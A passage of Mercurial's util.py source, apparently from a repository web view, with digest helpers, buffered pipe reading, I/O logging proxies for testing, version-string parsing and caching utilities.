util: use a context manager in readlock()
Matt Harbison
r39941:4017968f default
# util.py - Mercurial utility functions and platform specific implementations
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""Mercurial utility functions and platform specific implementations.

This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
"""

from __future__ import absolute_import, print_function

import abc
import bz2
import collections
import contextlib
import errno
import gc
import hashlib
import itertools
import mmap
import os
import platform as pyplatform
import re as remod
import shutil
import socket
import stat
import sys
import time
import traceback
import warnings
import zlib

from .thirdparty import (
    attr,
)
from hgdemandimport import tracing
from . import (
    encoding,
    error,
    i18n,
    node as nodemod,
    policy,
    pycompat,
    urllibcompat,
)
from .utils import (
    procutil,
    stringutil,
)

base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

cookielib = pycompat.cookielib
httplib = pycompat.httplib
pickle = pycompat.pickle
safehasattr = pycompat.safehasattr
socketserver = pycompat.socketserver
bytesio = pycompat.bytesio
# TODO deprecate stringio name, as it is a lie on Python 3.
stringio = bytesio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr

if pycompat.iswindows:
    from . import windows as platform
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
expandglobs = platform.expandglobs
getfsmountpoint = platform.getfsmountpoint
getfstype = platform.getfstype
groupmembers = platform.groupmembers
groupname = platform.groupname
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
posixfile = platform.posixfile
readlink = platform.readlink
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setflags = platform.setflags
split = platform.split
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
umask = platform.umask
unlink = platform.unlink
username = platform.username

try:
    recvfds = osutil.recvfds
except AttributeError:
    pass

# Python compatibility

_notset = object()

def bitsfrom(container):
    bits = 0
    for bit in container:
        bits |= bit
    return bits

# Python 2.6 still has deprecation warnings enabled by default. We do not want
# to display anything to the standard user, so detect if we are running tests
# and only use python deprecation warnings in that case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')
    warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                            DeprecationWarning, r'mercurial')
    # TODO: reinvent imp.is_frozen()
    warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
                            DeprecationWarning, r'mercurial')

def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a python-native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if _dowarn:
        msg += ("\n(compatibility will be dropped after Mercurial-%s,"
                " update your code.)") % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)

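# A minimal usage sketch (illustrative only; the helper name is made up):
# with HGEMITWARNINGS set in the environment, the call below emits a
# DeprecationWarning attributed to the deprecated function's caller;
# outside of tests it is a noop.
def _deprecationexample():
    nouideprecwarn(b'util.foo is deprecated, use util.bar', b'4.8',
                   stacklevel=2)
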
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            raise error.Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None

class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        if self._size != self._got:
            raise error.Abort(_('size mismatch: expected %d, got %d') %
                              (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise error.Abort(_('%s mismatch: expected %s, got %s') %
                                  (k, v, self._digester[k]))

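# A minimal usage sketch (illustrative only; the helper name is made up):
# wrap a file handle with the expected size and hex digests, read it to the
# end through the wrapper, then call validate() to abort on any mismatch.
def _digestcheckerexample(fh, size, sha1hex):
    wrapped = digestchecker(fh, size, {'sha1': sha1hex})
    while wrapped.read(4096):
        pass
    wrapped.validate()    # raises error.Abort if size or sha1 disagree
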
try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]

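# A minimal sketch (illustrative only; the helper name is made up) showing
# that the Python 3 fallback above hands out zero-copy memoryview slices:
def _bufferexample():
    data = b'abcdef'
    view = buffer(data, 2, 3)      # a view over b'cde'; nothing is copied
    return bytes(view) == b'cde'   # True on both Python 2 and Python 3
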
_chunksize = 4096

class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class lets us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []
        self._eof = False
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True if any data is currently buffered

        This will be used externally as a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def unbufferedread(self, size):
        if not self._eof and self._lenbuf == 0:
            self._fillbuffer(max(size, _chunksize))
        return self._frombuffer(min(self._lenbuf, size))

    def readline(self, *args, **kwargs):
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapses it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self, size=_chunksize):
        """read data into the buffer"""
        data = os.read(self._input.fileno(), size)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data

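# A minimal usage sketch (illustrative only; the helper name is made up):
# check hasbuffer before blocking in select(), since select() cannot see
# bytes that this class has already pulled into its private buffer.
def _bufferedpipeexample(pipe):
    import select
    bufpipe = bufferedinputpipe(pipe)
    if not bufpipe.hasbuffer:
        # nothing buffered yet, so it is safe to wait on the fd
        select.select([bufpipe.fileno()], [], [])
    return bufpipe.readline()
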
def mmapread(fp):
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise

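# A minimal usage sketch (illustrative only; the helper name and path are
# made up): mmapread() accepts a file object or descriptor and returns a
# read-only, bytes-like mapping of the entire file.
def _mmapreadexample():
    with open('/tmp/example', 'rb') as fp:
        data = mmapread(fp)    # mmap object, or '' for an empty file
        return data[:16]       # sliceable without reading the whole file
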
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed is a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)

class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res

PROXIED_SOCKET_METHODS = {
    r'makefile',
    r'recv',
    r'recvfrom',
    r'recvfrom_into',
    r'recv_into',
    r'send',
    r'sendall',
    r'sendto',
    r'setblocking',
    r'settimeout',
    r'gettimeout',
    r'setsockopt',
}

class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, sock, observer):
        object.__setattr__(self, r'_orig', sock)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, r'_observedcall')(
            r'makefile', *args, **kwargs)

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, r'_observer')
        return makeloggingfileobject(observer.fh, res, observer.name,
                                     reads=observer.reads,
                                     writes=observer.writes,
                                     logdata=observer.logdata,
                                     logdataapis=observer.logdataapis)

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv', *args, **kwargs)

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom', *args, **kwargs)

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom_into', *args, **kwargs)

    def recv_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv_into', *args, **kwargs)

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'send', *args, **kwargs)

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendall', *args, **kwargs)

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendto', *args, **kwargs)

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setblocking', *args, **kwargs)

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'settimeout', *args, **kwargs)

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'gettimeout', *args, **kwargs)

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setsockopt', *args, **kwargs)

class baseproxyobserver(object):
    def _writedata(self, data):
        if not self.logdata:
            if self.logdataapis:
                self.fh.write('\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(': %s\n' % stringutil.escapestr(data))
            else:
                self.fh.write('%s> %s\n'
                              % (self.name, stringutil.escapestr(data)))
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(':\n')

        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n'
                          % (self.name, stringutil.escapestr(line)))
        self.fh.flush()

class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        if size == -1 and res == '':
            # Suppress pointless read(-1) calls that return
            # nothing. These happen _a lot_ on Python 3, and there
            # doesn't seem to be a better workaround to have matching
            # Python 2 and 3 behavior. :(
            return

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        data = dest[0:res] if res is not None else b''
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)

def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object."""

    observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
                                  logdata=logdata, logdataapis=logdataapis)
    return fileobjectproxy(fh, observer)

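# A minimal usage sketch (illustrative only; the helper name is made up):
# mirror every read and write on a file object into a log handle, here
# both backed by in-memory bytesio objects.
def _loggingfileobjectexample():
    log = bytesio()
    fh = makeloggingfileobject(log, bytesio(), b'example', logdata=True)
    fh.write(b'hello')    # log gains "example> write(5) -> 5: hello"
    fh.seek(0)
    fh.read()             # log gains "example> read(-1) -> 5: hello"
    return log.getvalue()
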
class socketobserver(baseproxyobserver):
    """Logs socket activity."""
    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        self.fh = fh
        self.name = name
        self.reads = reads
        self.writes = writes
        self.states = states
        self.logdata = logdata
        self.logdataapis = logdataapis

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        # send() returns the number of bytes written as an int.
        self.fh.write('%s> send(%d, %d) -> %d' % (
            self.name, len(data), flags, res))
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write('%s> sendall(%d, %d)' % (
                self.name, len(data), flags))

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                self.name, len(data), flags, address, res))

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))

def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket."""

    observer = socketobserver(logh, name, reads=reads, writes=writes,
                              states=states, logdata=logdata,
                              logdataapis=logdataapis)
    return socketproxy(fh, observer)

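# A minimal usage sketch (illustrative only; the helper name is made up):
# wrap a connected socket so state changes and traffic are mirrored to a
# log handle.
def _loggingsocketexample(sock):
    log = bytesio()
    logged = makeloggingsocket(log, sock, b'example')
    logged.settimeout(5)      # log gains "example> settimeout(5)"
    logged.sendall(b'ping')   # log gains "example> sendall(4, 0)"
    return logged.recv(4), log.getvalue()
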
def version():
    """Return version information if available."""
    try:
        from . import __version__
        return __version__.version
    except ImportError:
        return 'unknown'

def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')

    >>> versiontuple(b'4.6rc0')
    (4, 6, None, 'rc0')
    >>> versiontuple(b'4.6rc0+12-425d55e54f98')
    (4, 6, None, 'rc0+12-425d55e54f98')
    >>> versiontuple(b'.1.2.3')
    (None, None, None, '.1.2.3')
    >>> versiontuple(b'12.34..5')
    (12, 34, None, '..5')
    >>> versiontuple(b'1.2.3.4.5.6')
    (1, 2, 3, '.4.5.6')
    """
    if not v:
        v = version()
    m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
    if not m:
        vparts, extra = '', v
    elif m.group(2):
        vparts, extra = m.groups()
    else:
        vparts, extra = m.group(1), None

    vints = []
    for i in vparts.split('.'):
1044 try:
1044 try:
1045 vints.append(int(i))
1045 vints.append(int(i))
1046 except ValueError:
1046 except ValueError:
1047 break
1047 break
1048 # (3, 6) -> (3, 6, None)
1048 # (3, 6) -> (3, 6, None)
1049 while len(vints) < 3:
1049 while len(vints) < 3:
1050 vints.append(None)
1050 vints.append(None)
1051
1051
1052 if n == 2:
1052 if n == 2:
1053 return (vints[0], vints[1])
1053 return (vints[0], vints[1])
1054 if n == 3:
1054 if n == 3:
1055 return (vints[0], vints[1], vints[2])
1055 return (vints[0], vints[1], vints[2])
1056 if n == 4:
1056 if n == 4:
1057 return (vints[0], vints[1], vints[2], extra)
1057 return (vints[0], vints[1], vints[2], extra)
1058
1058
1059 def cachefunc(func):
1059 def cachefunc(func):
1060 '''cache the result of function calls'''
1060 '''cache the result of function calls'''
1061 # XXX doesn't handle keyword args
1061 # XXX doesn't handle keyword args
1062 if func.__code__.co_argcount == 0:
1062 if func.__code__.co_argcount == 0:
1063 cache = []
1063 cache = []
1064 def f():
1064 def f():
1065 if len(cache) == 0:
1065 if len(cache) == 0:
1066 cache.append(func())
1066 cache.append(func())
1067 return cache[0]
1067 return cache[0]
1068 return f
1068 return f
1069 cache = {}
1069 cache = {}
1070 if func.__code__.co_argcount == 1:
1070 if func.__code__.co_argcount == 1:
1071 # we gain a small amount of time because
1071 # we gain a small amount of time because
1072 # we don't need to pack/unpack the list
1072 # we don't need to pack/unpack the list
1073 def f(arg):
1073 def f(arg):
1074 if arg not in cache:
1074 if arg not in cache:
1075 cache[arg] = func(arg)
1075 cache[arg] = func(arg)
1076 return cache[arg]
1076 return cache[arg]
1077 else:
1077 else:
1078 def f(*args):
1078 def f(*args):
1079 if args not in cache:
1079 if args not in cache:
1080 cache[args] = func(*args)
1080 cache[args] = func(*args)
1081 return cache[args]
1081 return cache[args]
1082
1082
1083 return f
1083 return f
1084
1084
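# Usage sketch (editor's addition, not part of util.py): cachefunc builds a
# simple memoizer keyed on positional arguments; the wrapped callable runs
# once per distinct argument and later calls hit the cache. Keyword
# arguments are not supported (see the XXX above).
def _cachefuncexample():
    calls = []
    def square(x):
        calls.append(x)
        return x * x
    square = cachefunc(square)
    square(3)            # computes 9 and caches it
    square(3)            # served from the cache; the body does not re-run
    return calls == [3]  # True
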
1085 class cow(object):
1085 class cow(object):
1086 """helper class to make copy-on-write easier
1086 """helper class to make copy-on-write easier
1087
1087
1088 Call preparewrite before doing any writes.
1088 Call preparewrite before doing any writes.
1089 """
1089 """
1090
1090
1091 def preparewrite(self):
1091 def preparewrite(self):
1092 """call this before writes, return self or a copied new object"""
1092 """call this before writes, return self or a copied new object"""
1093 if getattr(self, '_copied', 0):
1093 if getattr(self, '_copied', 0):
1094 self._copied -= 1
1094 self._copied -= 1
1095 return self.__class__(self)
1095 return self.__class__(self)
1096 return self
1096 return self
1097
1097
1098 def copy(self):
1098 def copy(self):
1099 """always do a cheap copy"""
1099 """always do a cheap copy"""
1100 self._copied = getattr(self, '_copied', 0) + 1
